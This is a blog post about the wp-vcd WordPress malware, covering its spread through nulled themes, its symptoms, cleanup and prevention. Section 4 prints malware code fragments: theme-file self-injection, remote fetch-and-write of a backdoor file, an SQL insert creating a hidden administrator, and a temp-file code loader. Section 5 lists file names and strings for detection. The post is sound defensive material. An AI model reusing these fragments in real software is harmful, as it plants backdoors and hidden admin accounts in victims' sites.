How To Secure wp-vcd.php Malware Attack In WordPress Websites And Stay Protected

How To Secure wp-vcd.php Malware Attack In WordPress Websites And Stay Protected

Last Updated: 12th September, 2019

A few days back our own website experienced this wp-vcd.php Malware Attack, all of a sudden. We instantly took steps to resolve the issue with appropriate actions. We consulted with our hosting provider and later we secured our website from the wp-vcd.php Malware Attack with the help of free versions of Wordfence Security – Firewall & Malware Scan Plugin and Anti-Malware Security and Brute-Force Firewall Plugin and imposed some more security strategies.

Therefore, please don’t implement, change or delete any files without reading the full article. As we request you SHOULD NOT use each and every Security Plugins unless you know what you are doing. Finally, remember to always take a backup before whatever you do. Let’s now concentrate on our “How To Secure wp-vcd.php Malware Attack In WordPress Websites And Stay Protected” Guide.


#Real-Time Rich Metadata (First Step): More Cybersecurity Prevention In Real-Time

Table of Contents:-


Containerization: How To Enhance Security Of Your Containers

1: What Is WordPress wp-vcd Malware and wp-vcd Malware Hack?

As of late, we observed another new sort of malware infecting the WordPress websites by utilizing flaws in obsolete themes and plugins. The wp-vcd malware makes a backdoor access to your website by including hidden WordPress administrator users. Further, a few variations of the malicious codes have been believed to alter the core WordPress files and furthermore include new files in the installations /wp-includes directory.

  • The wp-vcd malware makes Spam URLs on the website (additionally alluded to as URL Injection).
  • The malware makes a backdoor passageway which enables hackers to access your website for longer periods.
  • Hackers can misuse the vulnerabilities in WordPress themes and plugins by uploading or transferring the wp-vcd malware on exposed websites.

Such a hack can be easily avoided by maintaining a strategic monitoring with a Web Application Firewall (WAF), such as Sucuri SiteCheck and customary malware scanning. It is additionally fundamental to check any modification of WordPress core files, themes and plugins.


Zero Trust: Five Misconception Debunked About Zero Trust’s Dependability

2: The top reasons that are responsible for the wp-vcd Malware Hack.

  • The most wide recognized reason of the hack was the utilization of a nulled theme in which the wp-vcd malware as a rule comes pre-hooked with each downloaded theme from any nulled theme websites.
  • If you are still utilizing obsolete WordPress themes and plugins on your website.
  • If NO Web Application Firewall (WAF) introduced to shield hacking efforts made by hackers.

UNICEF Leaks 8000 Online Learners Personal Data

3: What are the Signs and Symptoms of wp-vcd Malware?

  • A completely New WordPress Admin user has been included out of the blue.
  • Your hosting provider might have suspended your WordPress hosting account on account of wp-vcd malware attack to secure the other different websites on the same server.
  • SEO spam, for example, Japanese search results or Pharma Hack attack in Google Search Results is another very common sign and symptom of the game. Become familiar with WordPress spam in search results and how to secure them. The following is the screen capture of Google spam indexed results:
  • wp-vcd.php Malware Attack in Google-Search Results

  • Unknown JavaScript codes in the source of your website.
  • Pages of your website are being diverted to obscure and shady websites.
  • Unknown PHP files in your installations wp-includes folder which is not found in the WordPress GitHub repository.
  • There are PHP files in your installations wp-content/uploads directory and its sub-directory folders.

How To Resolve SQLi, CSRF/XSRF, XSS, Session Hijacking With Other PHP Security Issues

4: Scrutinizing of what the wp-vcd Malware does?

Within your theme (whatever theme you are using), in the functions.php file, you might observe some codes like this:

<?php if (file_exists(dirname(__FILE__) . '/class.theme-modules.php')) include_once(dirname(__FILE__) . '/class.theme-modules.php'); ?>

This code incorporates the class.theme-modules.php file which as it happens installs the wp-vcd malware into different themes already installed (regardless of enabled/disabled mode) and makes the various vindictive malicious files.

Below mentioned are the different patterns for code snippets of the malware suspicious code:

Pattern 1

ini_set('display_errors', 0);
$GLOBALS['WP_CD_CODE'] = 'PD9waHANCmVycm9y...(base64-encoded string of PHP code)
...; ?>

Pattern 2

if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
 @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
 if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
 @file_put_contents('wp-tmp.php', $tmpcontent);
 } ; ?>


HP And ExpressVPN Partnership To Engineer Better Online Security

Pattern 3

$install_code = 'c18615a1ef0e1cd813b388b4b6e29bcdc18615a1ef0e1cd813b388b4b6e29bcd[...Blah blah blah..]
$install_hash = md5($_SERVER['HTTP_HOST'] . AUTH_SALT);
   $install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code ));

Pattern 4

if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php')){
    if (strpos($content, 'WP_V_CD') === false){
        $content = $install_code . $content ;
        @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php', $content);
        touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php' , $time );
    else { $ping = false; }

Pattern 5

if ($ping) { $content = @file_get_contents(‘' . $_SERVER[“HTTP_HOST”] . ‘&password=’ . $install_hash); @file_put_contents(ABSPATH . ‘/wp-includes/class.wp.php’, file_get_contents(‘')); }
if ($ping2) { $content = @file_get_contents(‘' . $_SERVER[“HTTP_HOST”] . ‘&password=’ . $install_hash); @file_put_contents(ABSPATH . ‘wp-includes/class.wp.php’, file_get_contents(‘'));//echo ABSPATH . ‘wp-includes/class.wp.php’; }

Pattern 6

$wpdb->query(“INSERT INTO $wpdb->users (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES (‘100011111’, ‘100011111’, ‘\$P\$c18615a1ef0e1cd813b388b4B6e29bcd.’, ‘100011111’, ‘[email protected]’, ‘’, ‘2010–06–07 00:00:00’, ‘’, ‘0’, ‘100010010’)”);


Threat Intelligence Feeds (TI): Keeping Cybersecurity Threats At Bay

Pattern 7

if( isset($_GET[‘key’]) ) { $options = get_option( EWPT_PLUGIN_SLUG ); echo ‘<center><h2>’ . esc_attr( $options[‘user_name’] . ‘:’ . esc_attr( $options[‘api_key’])) . ‘<br>’; echo esc_html( envato_market()->get_option( ‘token’ ) ); echo ‘</center></h2>’; } }

Pattern 8

function wp_temp_setupx($phpCode) 
 $tmpfname = tempnam(sys_get_temp_dir(), “wp_temp_setupx”);
 $handle = fopen($tmpfname, “w+”); 
 fwrite($handle, “<?php\n” . $phpCode); 
 include $tmpfname; unlink($tmpfname);
 return get_defined_vars();

Pattern 9

foreach ($wpdb->get_results('SELECT * FROM `' . $wpdb->prefix . 'posts` WHERE `post_status` = "publish" AND `post_type` = "post" ORDER BY `ID` DESC', ARRAY_A) as $data)
$post_content = preg_replace('!<div id="'.$div_code_name.'">(.*?)</div>!s', '', $data -> post_content);
$file = preg_replace('/'.$matcholddiv[1][0].'/i',$_REQUEST['newdiv'], $file);
$file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
if ($wpdb -> query('INSERT INTO `' . $wpdb->prefix . 'datalist` SET `url` = "/'.mysql_escape_string($_REQUEST['url']).'", `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string($_REQUEST['content']).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'" ON DUPLICATE KEY UPDATE `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string(urldecode($_REQUEST['content'])).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'"'))


Defying Dante’s SOC And SIEMs Mythical Treachery Inferno

Pattern 10

if ( ! function_exists( 'wp_temp_setup' ) ) {
if($tmpcontent = @file_get_contents("".$path))

There may be more patterns, but we need to understand minutely and perfectly before we act on these patterns.

As we had analyzed in the before segment, this code would make another new administrator user with a name something like 100010010. The goal of this backdoor access administrator account is to ensure that the hacker can get to the website, regardless of whether you erase the malicious code – essentially, so the attackers could attack your website at a later purpose of time.


Cybersecurity For SEO: How Website Security Impacts In Google Ranking

5: How to clean up the wp-vcd Malware Infection?

Scan for the events of the underneath files/strings on your server and inspect their matters. Make sure to run a diff check of the file contents with relating files in the WordPress core GitHub repository or a plugin / theme directory. You can utilize both of the methodologies (or both) utilizing SSH (Secure Shell) or utilizing your IDE (Integrated Development Environment).

5.1: Strategy: 1 – Scan for files on the server that are typically vulnerable to get infected with the wp-vcd hack:

  1. wp-includes/wp-vcd.php
  2. wp-includes/wp-tmp.php
  3. wp-content/themes/*/functions.php (each and every theme installed on the server regardless of being dynamic or not)
  4. class.theme-modules.php
  5. class.wp.php
  6. admin.txt
  7. codexc.txt
  8. code1.php
  9. cookie.txt
  10. class.theme-modules.php (inside of your theme folder)
  11. codeX.php
  12. test.php

Top 21 Cyber Security Threats And How Threat Intelligence Can Help You

5.2: Strategy: 2 – Scan for string design patterns those are found in infected malware files:

  1. $install_code
  2. tmpcontentx
  3. function wp_temp_setupx
  4. wp-tmp.php
  6. stripos($tmpcontent, $wp_auth_key)

How to secure WordPress and stay protected from the Backdoor Hack


Information Security Threats And Tools To Help Mitigate Vulnerabilities

6: How to secure WordPress and stay protected from the Backdoor Hack?

  1. Create a simple yet bold security strategy for your WordPress website:
    1. Clean – Diligently make sure that your website files and the database is 100% clean and malware free.
    2. Secure – Install a good Web Application Firewall (WAF) like Wordfence Security – Firewall & Malware Scan Plugin to block any-kind of re-infection attempts.
    3. Monitor –Run regular malware scans to check if any of the files/database have been altered or not.
  2. Delete any-kind of unused WordPress themes (even if those are disabled).
  3. Totally avoid Nulled themes and plugins on your website.
  4. Regularly and religiously update the WordPress core files, Plugins and themes.

Kerala Police Recruits Humanoid Robot As Sub-Inspector On Front Desk Management

7: Conclusion and VILab India Ultimate WordPress Security Guide

Disinfecting any kind of infected websites with such malware isn’t in every case simple. Since, when they are actuated on a website, they will in general infect different sections of the website also by implanting the diverse kind of malicious codes.

Moreover, this specific malware likewise makes a backdoor access which permits the trouble makers to control with your website. Consequently, it is vital to make a viable security strategy which completes an exhaustive analysis of your website. Also, a while later totally expels the hack from your website. We strongly recommend that you must follow our Ultimate WordPress Security Guide, where you can find 25+ tricks and resolutions to stay secure online.

Try hard not to be selfish. Must share with all of yours WordPress users and friends.

, , , , , , , , , , , , ,
Previous Post
FTC: Romance Scams Ranking Higher In Dissipation Than Any Other Forgeries
Next Post
Website Backdoors: How To Find, Detect, Remove, Prevent Backdoors And Secure Your Website

Related Posts

Leave a Reply

Your email address will not be published. Required fields are marked *

Fill out this field
Fill out this field
Please enter a valid email address.
You need to agree with the terms to proceed


Pin It on Pinterest